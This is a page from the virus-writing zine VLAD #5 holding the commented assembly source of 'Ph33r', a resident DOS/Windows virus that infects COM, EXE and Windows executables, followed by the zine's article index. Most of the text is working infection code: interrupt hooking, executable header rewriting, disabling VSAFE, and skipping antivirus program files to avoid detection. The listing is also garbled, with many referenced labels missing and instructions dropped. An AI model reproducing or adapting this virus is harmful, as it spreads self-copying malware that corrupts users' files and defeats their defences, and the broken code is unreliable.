Virus Labs & Distribution
VLAD #5 - Ph33r

;                        Ph33r
;                      Qark/VLAD
; This virus is the first ever DOS/Windows virus, infecting COM/EXE/WinEXE
; files.
; The technology of the Windows infection is superior to 'Winsurfer'
; in that the virus goes directly resident, without having to mess around
; infecting the Windows 'shell'.  The Windows entry of the virus allocates
; memory, points a selector to it, copies the virus into the space and
; sets interrupt 21h to the resident virus.  By careful programming it was
; possible to make both the DOS and Win interrupt handlers share the same
; code.
; The virus does a few interesting things:
;       Disables MSAV by turning it off (DOS)
;       Gets the original Int 21h using DOSSEG:109Eh (DOS)
;       Won't infect a number of filenames 'AV' 'AN' 'OT' (DOS & Win)
; A few annoying things:
;       If the DOS handler traps Int 21h AH=3Dh Windows crashes on load.
;       If the virus infects WIN386.EXE Windows crashes on load.
; These have both been fixed, by removal.
; For some unknown reason, the virus causes Debug to crash on exit.
; I haven't fixed this, because I figure anyone who uses Debug will spot
; the virus anyway.  Besides which, I haven't got a clue why it's happening :)
; For this virus, AVP & TBAV pick up nothing whilst F-Prot detects it
; heuristically.

        org     0

com_entry:                              ;COM files begin execution here.
        call    exec_start
        push    es
        pop     ds

        ;COM file exit.

        mov     di,100h
        push    di

        db      0b8h                    ;MOV AX,xxxx
old2    dw      20cdh
        db      0b8h                    ;MOV AX,xxxx
old4    dw      0
        xor     ax,ax
        xor     bx,bx
        xor     cx,cx
        xor     dx,dx
        xor     si,si
        xor     di,di

exe_entry:                              ;EXE files begin execution here.
        call    exec_start
        push    es
        pop     ds
        ;Setup ss:sp
        mov     ax,ds
        add     ax,10h
        db      5                       ;ADD AX,xxxx
old_ss  dw      0
        mov     ss,ax
        db      0bch                    ;MOV SP,xxxx
old_sp  dw      0

        ;setup the return
        mov     ax,ds
        add     ax,10h
        db      5                       ;ADD AX,xxxx
exe_cs  dw      0
        push    ax
        db      0b8h                    ;MOV AX,xxxx
exe_ip  dw      0
        push    ax
        xor     ax,ax
        xor     bx,bx
        xor     cx,cx
        xor     dx,dx
        xor     si,si
        xor     di,di

        mov     ax,51ffh                ;Test resident.
        int     21h
        cmp     ax,0ff51h
        je      exit_virus

        mov     ax,0fa02h               ;Kill VSAFE.
        mov     dx,5945h                ;Every DOS6+ user has a copy of this.
        xor     bl,bl
        int     16h
        mov     ax,ds
        dec     ax
        mov     ds,ax                   ;MCB seg in DS.
        xor     di,di
        cmp     byte ptr [di],'Y'       ;Z block ?
        ja      allocate
        sub     word ptr [di+3],(offset virus_size*2/16)+1
        sub     word ptr [di+12h],(offset virus_size*2/16)+1
        mov     ax,word ptr [di+12h]

        push    es
        mov     es,ax
        push    cs
        pop     ds
        mov     cx,offset virus_size

        ;Get delta offset in SI
        call    next
        pop     si
        sub     si,offset next

        ;Move virus to free memory.
        rep     movsb

        mov     ds,cx                   ;DS=CX=0 from REP MOVSB

        ;Set int21h
        mov     si,21h*4
        mov     di,offset i21
        push    si
        pop     si
        mov     di,offset orig21

        mov     word ptr [si-4],offset int21handler
        mov     word ptr [si-2],es

        push    es
        mov     ah,52h                  ;Thanx Neurobasher!
        int     21h
        mov     ax,es
        pop     es
        mov     ds,ax

        mov     si,109eh                ;DS:109Eh = Original Int 21 I hope.
        cmp     ax,9090h
        jne     reset21
        cmp     al,0e8h
        jne     reset21
        mov     word ptr es:orig21,10a0h
        mov     word ptr es:orig21+2,ds
        pop     es

        db      '=Ph33r='

win21:                          ;Windows interrupt handling begins here.
        cmp     ax,51feh
        jne     non_w_res
        xchg    al,ah
        cmp     ax,4b00h                ;Execute.
        je      check_infect
        cmp     ah,3dh                  ;File Open.
        je      check_infect
        cmp     ah,56h                  ;Rename.
        je      check_infect
        cmp     ah,43h                  ;Chmod.
        jne     int_exit

        push    ds
        push    es
        mov     ax,0ah                  ;This function makes our CS writable.
        mov     bx,cs
        int     31h
        mov     es,ax

        call    setup_infect

        pop     es
        pop     ds
        jmp     int_exit

int21handler:                           ;DOS interrupt handling begins here.
        cmp     ax,51ffh
        jne     non_res
        xchg    al,ah

        db      'Qark/VLAD'

;For some reason, checking for AH=3dh crashes windows when its booting.

        cmp     ax,4b00h                ;Execute.
        je      do_file
        cmp     ah,6ch                  ;Open.
        je      do_file
        cmp     ah,56h                  ;Rename.
        je      do_file
        cmp     ah,43h                  ;Chmod.
        je      do_file

        db      0eah
i21     dd      0

        push    es
        push    dx
        cmp     ah,6ch
        jne     no_6c_fix
        mov     dx,si
        push    cs
        pop     es
        call    setup_infect
        pop     dx
        pop     es
        jmp     int_exit

;on entry to this call, es=writable cs
        push    ax
        push    bx
        push    cx
        push    dx
        push    si
        push    di
        push    ds
        push    es
        mov     si,dx
        cmp     al,0
        jne     asciiz
        sub     si,4
        or      ax,2020h
        cmp     ax,'xe'                 ;EXE
        je      do_inf
        cmp     ax,'ld'                 ;DLL
        je      do_inf
        cmp     ax,'oc'                 ;COM
        jne     not_name
        cmp     word ptr [si-5],'68'    ;Dont infect WIN386.EXE (hangs)
        je      not_name
        mov     ax,word ptr [si-5]
        or      ax,2020h                ;Lowercase.
        cmp     ax,'va'                 ;Don't touch files that end in AV
        je      not_name                ;eg TBAV
        cmp     ax,'vd'                 ;DV.COM checks DV.EXE
        je      not_name
        cmp     ax,'na'                 ;Don't touch files that end in AN
        je      not_name                ;eg SCAN, TBSCAN
        cmp     ax,'to'                 ;Don't touch files that end in OT
        je      not_name                ;eg F-PROT

        call    infect
        pop     es
        pop     ds
        pop     di
        pop     si
        pop     dx
        pop     cx
        pop     bx
        pop     ax


;DS:DX=Filename, ES=our data segment
        mov     ax,3d02h                ;Open file to be infected.
        call    int21h
        jnc     file_opened
        xchg    bx,ax                   ;File handle into BX.
        push    es
        pop     ds
        mov     ah,3fh                  ;Read from file.
        mov     cx,512
        mov     dx,offset virus_size
        call    int21h

        mov     si,offset virus_size
        mov     ax,word ptr [si]
        or      ax,2020h
        cmp     ax,'zm'                 ;Test for EXE header
        je      check_exe
        jmp     com_infect
        cmp     word ptr [si+12h],0afafh        ;Infection marker.
        jne     not_infected
        jmp     com_end
        cmp     word ptr [si+18h],40h           ;Windows executable.
        jb      exe_infect
        jmp     windows_infect
        cmp     word ptr [si+0ch],-1            ;Maxmem = All
        jne     bad_mem
        call    lseek_end                       ;Get file length in DX:AX
        or      dx,dx
        jnz     ok_exe_size
        cmp     ax,1000
        jb      bad_mem
        mov     cx,512
        div     cx
        inc     ax
        cmp     [si+4],ax                       ;Check for overlays.
        ja      bad_mem

        mov     ax,word ptr [si+0eh]            ;Save the original SS:SP
        mov     word ptr old_ss,ax
        mov     ax,word ptr [si+10h]
        mov     word ptr old_sp,ax

        mov     ax,word ptr [si+14h]            ;Save the original CS:IP
        mov     word ptr exe_ip,ax
        mov     ax,word ptr [si+16h]
        mov     word ptr exe_cs,ax

        call    lseek_end
        mov     cx,16
        div     cx

        sub     ax,word ptr [si+8]
        add     dx,offset exe_entry
        mov     word ptr [si+14h],dx    ;New IP
        mov     word ptr [si+16h],ax    ;New CS
        dec     ax
        mov     word ptr [si+0eh],ax
        add     dx,1500
        and     dx,0fffeh
        mov     word ptr [si+10h],dx

        call    save_time

        mov     cx,offset virus_size
        mov     ah,40h
        xor     dx,dx
        call    int21h

        call    lseek_end

        mov     cx,512
        div     cx
        or      dx,dx
        jz      no_page_fix
        inc     ax
        mov     word ptr [si+4],ax
        mov     word ptr [si+2],dx
        call    lseek_start
        mov     word ptr [si+12h],0afafh        ;Set infection marker.
        mov     ah,40h
        mov     dx,si
        mov     cx,1ch
        call    int21h

        call    restore_time

        jmp     com_end

        cmp     byte ptr [si+3],0afh    ;Com infection marker.
        je      com_end

        ;Save first four com file bytes.
        mov     di,offset old2
        mov     di,offset old4
        mov     ax,4202h                ;Lseek to file end.
        xor     cx,cx
        call    int21h

        or      dx,dx                   ;Check if > 64k
        jnz     com_end
        cmp     ax,60000                ;Check if > 60000
        ja      com_end
        cmp     ax,1024
        jb      com_end

        sub     ax,3
        mov     word ptr com_jmp+1,ax

        call    save_time

        mov     ah,40h                  ;Write virus body to file.
        mov     cx,offset virus_size
        xor     dx,dx
        call    int21h
        jc      com_end

        mov     ax,4200h                ;Lseek to file start.
        xor     cx,cx
        call    int21h

        mov     ah,40h                  ;Write jump to start of file.
        mov     cx,4
        mov     dx,offset com_jmp
        call    int21h

        call    restore_time

        mov     ah,3eh                  ;Close file.
        call    int21h



        ;Move the Newexe pointer forward.
        push    word ptr [si+3ch]
        pop     word ptr newexe_off

        sub     word ptr [si+3ch],8
        cmp     word ptr [si+3eh],0     ;Dont want any NE headers at off >64k
        jne     com_end
        mov     word ptr [si+12h],0afafh        ;Set infection marker.
        ;Lseek back to start of the file.
        mov     ax,4200h
        xor     cx,cx
        call    int21h

        call    save_time

        ;Write header back.
        mov     ah,40h
        mov     cx,512
        mov     dx,offset virus_size
        call    int21h
        jc      com_end

        ;Lseek to new exe header
        mov     ax,4200h
        mov     dx,word ptr newexe_off
        xor     cx,cx
        call    int21h

        ;Read in new exe header
        mov     ah,3fh
        mov     cx,512
        mov     dx,offset virus_size
        call    int21h

        ;Adjust header pointers
        mov     ax,word ptr [si+22h]    ;AX=Segment table offset.
        cmp     word ptr [si+4],ax
        jb      ok_et
        add     word ptr [si+4],8
        cmp     word ptr [si+24h],ax
        jb      ok_rt
        add     word ptr [si+24h],8
        cmp     word ptr [si+26h],ax
        jb      ok_rnt
        add     word ptr [si+26h],8
        cmp     word ptr [si+28h],ax
        jb      ok_mrt
        add     word ptr [si+28h],8
        cmp     word ptr [si+2ah],ax
        jb      ok_int
        add     word ptr [si+2ah],8
        mov     ax,word ptr [si+1ch]
        inc     word ptr [si+1ch]       ;Increase segment count.
        xor     dx,dx
        mov     cx,8
        mul     cx

        add     ax,word ptr [si+22h]    ;AX=Offset of segment table end.
        adc     dx,0
        mov     cx,512                  ;512 byte portions are used
                                        ; for the reads later on.
        div     cx

        mov     word ptr ne_size,ax
        mov     word ptr last_ne,dx

        ;Put the original CS:IP into our relocation table.
        push    word ptr [si+14h]
        pop     word ptr old_ip
        push    word ptr [si+16h]
        pop     word ptr old_cs

        ;Save the alignment shift count because we need that for calculating
        ;the offset of our segment when writing the segment entry.
        push    word ptr [si+32h]
        pop     word ptr al_shift

        ;Point CS:IP to the virus.
        mov     word ptr [si+14h],offset win_entry      ;The new IP
        mov     ax,word ptr [si+1ch]
        mov     word ptr [si+16h],ax                    ;The new CS

        ;Initialise the lseek variable
        push    word ptr newexe_off
        pop     word ptr lseek

        ;The below code gets the NE header and keeps moving it forward by
        ;eight bytes in 512 byte chunks.
        mov     ax,word ptr ne_size
        or      ax,ax
        jz      last_page

        dec     word ptr ne_size

        mov     ax,4200h                ;Lseek to our current position.
        xor     cx,cx
        mov     dx,word ptr lseek
        sub     dx,8
        call    int21h

        mov     ah,40h                  ;Write the header section out.
        mov     cx,512
        mov     dx,si
        call    int21h

        add     word ptr lseek,512

        mov     ax,4200h                ;Lseek to the next chunk.
        xor     cx,cx
        mov     dx,word ptr lseek
        call    int21h

        mov     ah,3fh                  ;Read it.
        mov     dx,offset virus_size
        mov     cx,512
        call    int21h

        jmp     move_header_forward

        mov     ax,4202h                ;Lseek to end of file.
        xor     cx,cx
        call    int21h                  ;File length into DX:AX

        ;DX:AX=File offset of our segment
        ;Below section shifts the segment offset right by the alignment
        ;shift value.
        mov     cl,byte ptr al_shift
        push    bx
        mov     bx,1
        shl     bx,cl
        mov     cx,bx
        pop     bx
        div     cx

        mov     word ptr lseek_add,0
        or      dx,dx
        jz      no_extra
        sub     cx,dx
        mov     word ptr lseek_add,cx
        inc     ax
        mov     di,si
        add     di,word ptr last_ne

        ;Adding the new segment table entry
        mov     word ptr [di],ax        ;Segment offset
        mov     word ptr [di+2],offset virus_size
        mov     word ptr [di+4],180h    ;Segment attribute
                                        ; 180h = NonMovable + Relocations
        mov     word ptr [di+6],offset virus_size+512

        mov     ax,4200h                ;Lseek to next position.
        xor     cx,cx
        mov     dx,word ptr lseek
        sub     dx,8
        call    int21h

        mov     ah,40h          ;Write rest of NE header + new seg entry.
        mov     cx,word ptr last_ne
        add     cx,8            ;Added segment entry means eight more.
        mov     dx,offset virus_size
        call    int21h

        ;Reset the relocatable pointer.
        push    word ptr winip
        push    word ptr wincs
        mov     word ptr winip,0
        mov     word ptr wincs,0ffffh

        mov     ax,4202h                ;Lseek to end of file.
        xor     cx,cx
        mov     dx,word ptr lseek_add
        call    int21h

        mov     ah,40h                  ;Write main virus body.
        mov     cx,offset virus_size
        xor     dx,dx
        call    int21h

        pop     word ptr wincs
        pop     word ptr winip

        mov     ah,40h                  ;Write the relocation item.
        mov     cx,offset reloc_end - offset relocblk
        mov     dx,offset relocblk
        call    int21h

        jmp     com_time_end

int21h:                                 ;Simulated int 21 call.
        call    dword ptr cs:orig21
orig21  dd      0

win_entry:                              ;WinEXE files begin execution here.
        push    ds
        push    es

        mov     ax,51feh                ;Residency test.
        int     21h
        cmp     ax,0ff51h
        je      no_wintsr
        mov     ax,000ah                ;Make CS writable.
        mov     bx,cs
        int     31h                     ;Use DPMI.
        mov     ds,ax

        mov     ax,0204h                ;Get real mode interrupt vector.
        mov     bl,21h
        int     31h

        mov     word ptr i21,dx         ;Save int21
        mov     word ptr i21+2,cx

        mov     word ptr orig21,dx
        mov     word ptr orig21+2,cx

        mov     ax,501h
        xor     bx,bx                   ;Allocate Linear region
        mov     cx,offset v_mem_size
        int     31h

        push    bx
        push    cx

        xor     ax,ax
        mov     cx,1                    ;Create a Selector
        int     31h

        mov     bx,ax
        mov     ax,7
        pop     dx                      ;Point selector to linear region.
        pop     cx
        int     31h

        mov     ax,8
        xor     cx,cx                   ;Set selector limit
        mov     dx,offset v_mem_size
        int     31h

        mov     es,bx
        mov     cx,offset v_mem_size
        xor     si,si                   ;Copy virus to the linear region
        xor     di,di
        rep     movsb

        mov     bx,es
        mov     ax,9                    ;Set access rights to 'Code'
        mov     cx,0ffh
        int     31h

        mov     cx,es
        mov     dx,offset win21
        mov     ax,205h
        mov     bl,21h
        int     31h                     ;Set real mode interrupt vector.

        mov     ax,4
        push    es
        pop     bx                      ;Lock the selector
        int     31h

        pop     es
        pop     ds

        db      0eah                    ;Return to original file.
winip   dw      0
wincs   dw      0ffffh

;Infection Procedures
        push    ax
        push    cx
        push    dx

        mov     ax,5700h
        call    int21h

        mov     word ptr time,cx
        mov     word ptr date,dx

        pop     dx
        pop     cx
                                                                                pop     ax

        push    ax
        push    cx
        push    dx

        db      0bah            ;MOV DX,xxxx
        date    dw      0

        db      0b9h            ;MOV CX,xxxx
        time    dw      0

        mov     ax,5701h
        call    int21h

        pop     dx
        pop     cx
        pop     ax

        mov     al,0
        jmp     short lseek2
        mov     al,2
        mov     ah,42h
        xor     cx,cx
        call    int21h

;Infection Data
;Com infection data.
com_jmp         db      0e9h,0,0,0afh

;Windows infection data.
newexe_off      dw      0
al_shift        dw      0
ne_size         dw      0
last_ne         dw      0
lseek           dw      0
lseek_add       dw      0

        dw      1       ;Number of relocation items

        db      3       ;32bit pointer relocation
        db      4       ;Additive relocation
        dw      offset winip
old_cs  dw      0       ;The stored original CS & IP of host.
old_ip  dw      0


        db      512 dup (0)     ;Storage buffer.



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ARTICLE.1_7       Coding the Mag


ARTICLE.2_2       Neuroquila disasm
ARTICLE.2_3       Uruguay#3 disasm
ARTICLE.2_4       Immortal Riot
ARTICLE.2_5       Fog.doc
ARTICLE.2_6       Fog.asm
ARTICLE.2_7       AP-Poly


Dying Oath
ARTICLE.3_2       Win API tutorial
ARTICLE.3_3       Poly primer
ARTICLE.3_4       NoMut v0.01
ARTICLE.3_5       Demon3b
ARTICLE.3_6       SDFEe20 source
ARTICLE.3_7       ZL 2.0 source


Virus Descriptions
ARTICLE.4_2       Horsa
ARTICLE.4_3       Ph33r
ARTICLE.4_4       Wintiny
ARTICLE.4_5       Midnight
ARTICLE.4_6       Arme Stoevlar
ARTICLE.4_7       Small Virus


ARTICLE.5_2       Winlamer2
ARTICLE.5_3       Lady Death
ARTICLE.5_4       H8urNMEs
ARTICLE.5_5       Sepboot
ARTICLE.5_6       Fame
ARTICLE.5_7       Int Patch

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